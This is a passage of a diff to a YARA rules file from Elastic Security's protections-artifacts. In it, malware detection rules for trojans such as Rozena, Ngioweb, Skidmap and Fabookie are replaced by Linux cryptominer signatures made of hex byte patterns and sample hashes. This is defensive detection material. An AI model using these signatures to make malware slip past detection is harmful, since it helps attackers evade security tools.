fingerprint = "873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487" + fingerprint = "07a6b44ff1ba6143c76e7ccb3885bd04e968508e93c5f8bff9bc5efc42a16a96" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "] - [user: " ascii fullword - $a2 = "[-] data unpacked failed" ascii fullword - $a3 = "[+] data unpacked" ascii fullword - $a4 = "\\history\\" ascii fullword - $a5 = "PlayerName" ascii fullword + $a = { 00 70 6F 77 00 6C 6F 67 31 70 00 6C 6F 67 32 66 00 63 65 69 6C 00 } condition: all of them } -rule ELASTIC_Windows_Trojan_Fabookie_024F8759 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_1B76C066 : FILE MEMORY { meta: - description = "Detects Windows Trojan Fabookie (Windows.Trojan.Fabookie)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "024f8759-aaed-40fb-8052-35b58cf69f4e" - date = "2023-06-22" - modified = "2023-07-10" + id = "1b76c066-463c-46e5-8a08-ccfc80e3f399" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Fabookie.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6c6345c6f0a5beadc4616170c87ec8a577de185d53345581e1b00e72af24c13e" - logic_hash = "9477406b718c6489161cf4636be66c4f72df923b9c5a7ee4069ef6a9552de485" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L441-L459" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f60302de1a0e756e3af9da2547a28da5f57864191f448e341af1911d64e5bc8b" + logic_hash = "be239bc14d1adf05a5c6bf2b2557551566330644a049b256a7a5c0ab9549bd06" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0f5be9523a9a3f570e36ed8bbc9d113ffc8a40f868d5826e8b236d65f66e186b" + fingerprint = "e33937322a1a2325539d7cdb1df13295e5ca041a513afe1d5e0941f0c66347dd" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 48 89 C2 4D 33 C0 4D 33 C9 C7 44 24 20 02 00 00 80 } - $a2 = { C7 C2 80 84 1E 00 41 C7 C0 00 10 00 00 41 C7 C1 04 00 00 00 48 8B 44 24 } + $a = { 0C 14 89 0C 10 48 83 C2 04 48 83 FA 20 75 EF 48 8D 8C 24 F0 00 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Pgminer_Ccf88A37 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_B6Ea5Ee1 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Pgminer (Linux.Cryptominer.Pgminer)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "ccf88a37-2a58-40f9-8c13-f1ce218a2ec4" + id = "b6ea5ee1-ede5-4fa3-a065-99219b3530da" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Pgminer.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3afc8d2d85aca61108d21f82355ad813eba7a189e81dde263d318988c5ea50bd" - logic_hash = "77833cdb319bc8e22db2503478677d5992774105f659fe7520177a691c83aa91" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L461-L479" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "19b442c9aa229cd724ed9cbaa73f9dfaf0ed61aa3fd1bee7bf8ba964fc23a2b8" + logic_hash = "529119e07aa0243afddc3141dc441c314c3f75bdf3aee473b8bb7749c95fa78a" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "dc82b841a7e72687921c9b14bc86218c3377f939166d11a7cccd885dad4a06e7" + fingerprint = "07c2f1fcb50ce5bcdebfc03fca4aaacdbabab42a857d7cc8f008712ca576b871" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -109960,28 +110351,28 @@ rule ELASTIC_Linux_Cryptominer_Pgminer_Ccf88A37 : FILE MEMORY os = "linux" strings: - $a = { F6 41 83 C5 02 48 8B 5D 00 8A 0B 80 F9 2F 76 7E 41 83 FF 0A B8 0A 00 } + $a = { 47 20 49 8D 77 20 4C 89 74 24 10 4C 89 6C 24 18 4C 89 64 24 20 } condition: all of them } -rule ELASTIC_Linux_Cryptominer_Pgminer_5Fb2Efd5 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_050Ac14C : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Pgminer (Linux.Cryptominer.Pgminer)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "5fb2efd5-4adc-4285-bef1-6e4987066944" + id = "050ac14c-9aef-4212-97fd-e2a21c2f62e2" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Pgminer.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6d296648fdbc693e604f6375eaf7e28b87a73b8405dc8cd3147663b5e8b96ff0" - logic_hash = "4c247f40c9781332f04f82a244f6e8e22c9c744963f736937eddecf769b40a54" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L481-L499" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "36f2ce4e34faf42741f0a15f62e8b3477d69193bf289818e22d0e3ee3e906eb0" + logic_hash = "c34b0ff3ce867a76ef57fad7642de7916fa7baebf1a2a8d514f7b74be7231fd4" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8ac56b60418e3f3f4d1f52c7a58d0b7c1f374611d45e560452c75a01c092a59b" + fingerprint = "6f0a5a5d3cece7ae8db47ef5e1bbbea02b886e865f23b0061c2d346feb351663" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -109989,28 +110380,28 @@ rule ELASTIC_Linux_Cryptominer_Pgminer_5Fb2Efd5 : FILE MEMORY os = "linux" strings: - $a = { 00 16 00 00 00 0E 00 00 00 18 03 00 7F EB 28 33 C5 56 5D F2 50 67 C5 6F } + $a = { 47 08 49 3B 47 10 74 3C 48 85 C0 74 16 48 8B 13 48 89 10 48 8B } condition: all of them } -rule ELASTIC_Linux_Trojan_Rozena_56651C1D : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_Df937Caa : FILE MEMORY { meta: - description = "Detects Linux Trojan Rozena (Linux.Trojan.Rozena)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "56651c1d-548e-4a51-8f1c-e4add55ec14f" + id = "df937caa-ca6c-4a80-a68c-c265dab7c02c" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Rozena.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "997684fb438af3f5530b0066d2c9e0d066263ca9da269d6a7e160fa757a51e04" - logic_hash = "a6d283b0c398cb1004defe7f5669f912112262e5aaf677ae4ca7fd15565cb988" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L501-L519" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "19b442c9aa229cd724ed9cbaa73f9dfaf0ed61aa3fd1bee7bf8ba964fc23a2b8" + logic_hash = "d76a6008576687088f28674fb752e1a79ad2046e0208a65c21d0fcd284812ad8" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a86abe550b5c698a244e1c0721cded8df17d2c9ed0ee764d6dea36acf62393de" + fingerprint = "963642e141db6c55bd8251ede57b38792278ded736833564ae455cc553ab7d24" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -110018,28 +110409,28 @@ rule ELASTIC_Linux_Trojan_Rozena_56651C1D : FILE MEMORY os = "linux" strings: - $a = { 89 E1 95 68 A4 1A 70 C7 57 FF D6 6A 10 51 55 FF D0 68 A4 AD } + $a = { 04 62 20 0A 10 02 0A 14 60 29 00 02 0C 24 14 60 7D 44 01 70 01 } condition: all of them } -rule ELASTIC_Linux_Trojan_Skidmap_Aa7B661D : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_E9Ff82A8 : FILE MEMORY { meta: - description = "Detects Linux Trojan Skidmap (Linux.Trojan.Skidmap)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "aa7b661d-0ecc-4171-a0c2-a6c0c91b6d27" + id = "e9ff82a8-b8ca-45fb-9738-3ce0c452044f" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Skidmap.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4282ba9b7bee69d42bfff129fff45494fb8f7db0e1897fc5aa1e4265cb6831d9" - logic_hash = "aa976158d004d582234a92ff648d4581440f9c933a0abef212d9d837d9607ba4" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L521-L539" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "62ea137e42ce32680066693f02f57a0fb03483f78c365dffcebc1f992bb49c7a" + logic_hash = "9309aaad6643fa212bb04ce8dc7d24978839fe475f17d36e3b692320563b6fad" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0bd6bec14d4b0205b04c6b4f34988ad95161f954a1f0319dd33513cb2c7e5f59" + fingerprint = "91e78b1777a0580f25f7796aa6d9bcbe2cbad257576924aecfe513b1e1206915" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -110047,28 +110438,28 @@ rule ELASTIC_Linux_Trojan_Skidmap_Aa7B661D : FILE MEMORY os = "linux" strings: - $a = { E8 41 41 80 F8 1A 41 0F 43 C1 88 04 0E 48 83 C1 01 0F B6 04 0F } + $a = { D9 4D 01 CA 4C 89 74 24 D0 4C 8B 74 24 E8 4D 31 D4 49 C1 C4 20 48 C1 } condition: all of them } -rule ELASTIC_Linux_Trojan_Ngioweb_8Bd3002C : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_A5267Ea3 : FILE MEMORY { meta: - description = "Detects Linux Trojan Ngioweb (Linux.Trojan.Ngioweb)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "8bd3002c-d9c7-4f93-b7f0-4cb9ba131338" + id = "a5267ea3-b98c-49e9-8051-e33a101f12d3" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Ngioweb.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5480bc02aeebd3062e6d19e50a5540536ce140d950327cce937ff7e71ebd15e2" - logic_hash = "578fd1c3e6091df9550b3c2caf999d7a0432f037b0cc4b15642531e7fdffd7b7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L541-L559" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b342ceeef58b3eeb7a312038622bcce4d76fc112b9925379566b24f45390be7d" + logic_hash = "081633b5aa0490dbffcc0b8ab9850b59dbbd67d947c0fe68d28338a352e94676" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2ee5432cf6ead4eca3aad70e40fac7e182bdcc74dc22dc91a12946ae4182f1ab" + fingerprint = "8391a4dbc361eec2877852acdc77681b3a15922d9a047d7ad12d06271d53f540" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -110076,28 +110467,28 @@ rule ELASTIC_Linux_Trojan_Ngioweb_8Bd3002C : FILE MEMORY os = "linux" strings: - $a = { 24 18 67 8A 09 84 C9 74 0D 80 F9 2E 75 02 FF C0 FF 44 24 18 } + $a = { EE 6A 00 41 B9 01 00 00 00 48 8D 4A 13 4C 89 E7 88 85 40 FF } condition: all of them } -rule ELASTIC_Linux_Trojan_Ngioweb_A592A280 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_4E9075E6 : FILE MEMORY { meta: - description = "Detects Linux Trojan Ngioweb (Linux.Trojan.Ngioweb)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "a592a280-053f-47bc-8d74-3fa5d74bd072" + id = "4e9075e6-3ca9-459e-9f5f-3e614fd4f1c8" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Ngioweb.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5480bc02aeebd3062e6d19e50a5540536ce140d950327cce937ff7e71ebd15e2" - logic_hash = "b16cf5b527782680cc1da6f61dd537596792fed615993b19965ef2dbde701e64" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L561-L579" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "098bf2f1ce9d7f125e1c9618f349ae798a987316e95345c037a744964277f0fe" + logic_hash = "fe117f65666b9eac19fa588ee631f9be7551a3a9e3695b7ecbb77806658678aa" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "60f5ddd115fa1abac804d2978bbb8d70572de0df9da80686b5652520c03bd1ee" + fingerprint = "70d8c4ecb185b8817558ad9d26a47c340c977abb6abfca8efe1ff99efb43c579" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -110105,57 +110496,56 @@ rule ELASTIC_Linux_Trojan_Ngioweb_A592A280 : FILE MEMORY os = "linux" strings: - $a = { 75 06 8B 7C 24 2C EB 2C 83 FD 01 75 06 8B 7C 24 3C EB 21 83 } + $a = { 2C 24 74 67 48 89 5C 24 18 4C 89 6C 24 20 4C 89 FB 4D 89 E5 4C 8B } condition: all of them } -rule ELASTIC_Linux_Trojan_Ngioweb_D57Aa841 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_3A8D0974 : FILE MEMORY { meta: - description = "Detects Linux Trojan Ngioweb (Linux.Trojan.Ngioweb)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "d57aa841-8eb5-4765-9434-233ab119015f" - date = "2021-01-12" + id = "3a8d0974-384e-4d62-9aa8-0bd8f7d50206" + date = "2021-06-28" modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Ngioweb.yar#L41-L59" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "555d60bd863caff231700c5f606d0034d5aa8362862d1fd0c816615d59f582f7" - logic_hash = "b0db72ad81d27f5b2ac2d2bb903ff10849c304d40619fd95a39e7d48c64c45ba" + reference = "193fe9ea690759f8e155458ef8f8e9efe9efc8c22ec8073bbb760e4f96b5aef7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L581-L599" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "7039d461d8339d635a543fae2c6dbea284ce1b727d6585b69d8d621c603f37ac" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "83a4eb7c8ac42097d3483bcf918823105b4ea4291a566b4184eacc2a0f3aa3a4" - severity = 100 + fingerprint = "60cb81033461e73fcb0fb8cafd228e2c9478c132f49e115c5e55d5579500caa2" + severity = "100" arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a = { 24 0C 48 89 4C 24 10 4C 89 44 24 18 66 83 F8 02 74 10 BB 10 00 } + $a = { 07 41 89 34 06 48 83 C0 04 48 83 F8 20 75 EF 8B 42 D4 66 0F } condition: all of them } -rule ELASTIC_Linux_Trojan_Ngioweb_B97E0253 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_B9E6Ffdf : FILE MEMORY { meta: - description = "Detects Linux Trojan Ngioweb (Linux.Trojan.Ngioweb)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "b97e0253-497f-4c2c-9d4c-ad89af64847f" - date = "2021-01-12" + id = "b9e6ffdf-4b2b-4052-9c91-a06f43a2e7b8" + date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Ngioweb.yar#L61-L79" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5480bc02aeebd3062e6d19e50a5540536ce140d950327cce937ff7e71ebd15e2" - logic_hash = "dc11d50166a4d1b400c0df81295054192d42822dd3e065e374a92a31727d4dbd" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L601-L619" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c0f3200a93f1be4589eec562c4f688e379e687d09c03d1d8850cc4b5f90f192a" + logic_hash = "57d5b3eb5812a849d04695bdb1fb728a5ebd3bf5201ac3e7f36d37af0622eec2" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "859f29acec8bb05b8a8e827af91e927db0b2390410179a0f5b03e7f71af64949" + fingerprint = "fdd91d5802d5807d52f4c9635e325fc0765bb54cf51305c7477d2b791f393f3e" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -110163,28 +110553,28 @@ rule ELASTIC_Linux_Trojan_Ngioweb_B97E0253 : FILE MEMORY os = "linux" strings: - $a = { 41 5C 41 5D 41 5E 41 5F C3 67 0F BE 17 39 F2 74 12 84 D2 74 04 } + $a = { 89 D8 48 83 C4 20 5B C3 0F 1F 00 BF ?? ?? 40 00 } condition: all of them } -rule ELASTIC_Linux_Trojan_Ngioweb_66C465A0 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_7Ef74003 : FILE MEMORY { meta: - description = "Detects Linux Trojan Ngioweb (Linux.Trojan.Ngioweb)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "66c465a0-821d-43ea-82f5-fe787720bfbf" + id = "7ef74003-cd1f-4f2f-9c96-4dbcabaa36e4" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Ngioweb.yar#L81-L99" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7454ee074812d7fa49044de8190e17b5034b3f08625f547d1b04aae4054fd81a" - logic_hash = "71f224e3ee1ff29787258a61f29a37a9ddc51e9cb5df0693ea52fd4b6f0b5ad8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L621-L639" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a172cfecdec8ebd365603ae094a16e247846fdbb47ba7fd79564091b7e8942a0" + logic_hash = "1bde07dbb88357fcc02171512725be94d9fc0427c03afb2d59fbd0658c5d8e2e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e26071afff71506236b261a44e8f1903d348dd33b95597458649f377710492f4" + fingerprint = "187fd82b91ae6eadc786cadac75de5d919a2b8a592037a5bf8da2efa2539f507" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -110192,28 +110582,28 @@ rule ELASTIC_Linux_Trojan_Ngioweb_66C465A0 : FILE MEMORY os = "linux" strings: - $a = { 75 E6 B2 07 FE C0 EB DE 83 EC 10 6A 00 6A 00 6A 00 6A 00 FF 74 } + $a = { 41 56 45 31 F6 41 55 49 89 F5 41 54 44 8D 67 01 55 4D 63 E4 53 49 C1 } condition: all of them } -rule ELASTIC_Linux_Trojan_Ngioweb_D8573802 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_1D0700B8 : FILE MEMORY { meta: - description = "Detects Linux Trojan Ngioweb (Linux.Trojan.Ngioweb)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "d8573802-f141-4fd1-b06a-605451a72465" + id = "1d0700b8-1bc0-4da2-a903-9d78e79e71d8" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Ngioweb.yar#L101-L119" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7454ee074812d7fa49044de8190e17b5034b3f08625f547d1b04aae4054fd81a" - logic_hash = "b51ab7a7c26e889a4e8efc2b9883f709c17d82032b0c28ab3e30229d6f296367" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L641-L659" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "de59bee1793b88e7b48b6278a52e579770f5204e92042142cc3a9b2d683798dd" + logic_hash = "a24264cb071d269c82718aed5bc5c6c955e1cb2c7a63fe74d4033bfa6adf8385" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0052566dda66ae0dfa54d68f4ce03b5a2e2a442c4a18d70f16fd02303a446e66" + fingerprint = "19853be803f82e6758554a57981e1b52c43a017ab88242c42a7c39f6ead01cf3" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -110221,28 +110611,28 @@ rule ELASTIC_Linux_Trojan_Ngioweb_D8573802 : FILE MEMORY os = "linux" strings: - $a = { 10 40 74 38 51 51 6A 02 FF 74 24 18 FF 93 C8 00 00 00 83 C4 } + $a = { 30 42 30 42 00 22 22 03 5C DA 10 00 C0 00 60 43 9C 64 48 00 00 00 } condition: all of them } -rule ELASTIC_Linux_Trojan_Ngioweb_7926Bc8E : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_55Beb2Ee : FILE MEMORY { meta: - description = "Detects Linux Trojan Ngioweb (Linux.Trojan.Ngioweb)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "7926bc8e-110f-4b8a-8cc5-003732b6fcfd" + id = "55beb2ee-7306-4134-a512-840671cc4490" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Ngioweb.yar#L121-L139" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "555d60bd863caff231700c5f606d0034d5aa8362862d1fd0c816615d59f582f7" - logic_hash = "ac42dd714696825d64402861e96122cce7cd09ae8d9c43a19dd9cf95d7b09610" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L661-L679" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "edda1c6b3395e7f14dd201095c1e9303968d02c127ff9bf6c76af6b3d02e80ad" + logic_hash = "8a31b4866100b35d559d50f5db6f80d51bced93f9aac3f0d2d1de71ba692a3c5" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "246e06d73a3a61ade6ac5634378489890a5585e84be086e0a81eb7586802e98f" + fingerprint = "707a1478f86da2ec72580cfe4715b466e44c345deb6382b8dc3ece4e3935514d" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -110250,28 +110640,28 @@ rule ELASTIC_Linux_Trojan_Ngioweb_7926Bc8E : FILE MEMORY os = "linux" strings: - $a = { ED 74 31 48 8B 5B 10 4A 8D 6C 3B FC 48 39 EB 77 23 8B 3B 48 83 } + $a = { 24 FC 00 00 00 8B 84 24 C0 00 00 00 0F 29 84 24 80 00 00 00 0F 11 94 24 C4 00 } condition: all of them } -rule ELASTIC_Linux_Trojan_Ngioweb_E2377400 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_Fdd7340F : FILE MEMORY { meta: - description = "Detects Linux Trojan Ngioweb (Linux.Trojan.Ngioweb)" + description = "Detects Linux Cryptominer Generic (Linux.Cryptominer.Generic)" author = "Elastic Security" - id = "e2377400-8884-42fb-b524-9cdf836dac3a" + id = "fdd7340f-49d6-4770-afac-24104a3c2f86" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Ngioweb.yar#L141-L159" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b88daf00a0e890b6750e691856b0fe7428d90d417d9503f62a917053e340228b" - logic_hash = "71276698d1bdb9bc494fe6f1aa9755940583331836abc490e0b5ac3454d35de6" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Generic.yar#L681-L699" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "de59bee1793b88e7b48b6278a52e579770f5204e92042142cc3a9b2d683798dd" + logic_hash = "fd39ba5cf050d23de0889feefa9cd74dfb6385a09aa9dba90dc1d5d6cb020867" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "531a8fcb1c097f72cb9876a35ada622dd1129f90515d84b4c245920602419698" + fingerprint = "cc302eb6c133901cc3aa78e6ca0af16a620eb4dabb16b21d9322c4533f11d25f" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -110279,27 +110669,28 @@ rule ELASTIC_Linux_Trojan_Ngioweb_E2377400 : FILE MEMORY os = "linux" strings: - $a = { EC 08 8B 5C 24 10 8B 43 20 85 C0 74 72 83 7B 28 00 74 6C 83 7B } + $a = { EA 48 89 DE 48 8D 7C 24 08 FF 53 18 48 8B 44 24 08 48 83 78 } condition: all of them } -rule ELASTIC_Linux_Trojan_Ngioweb_994F1E97 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Generic_2627921E : FILE MEMORY { meta: - description = "Detects Linux Trojan Ngioweb 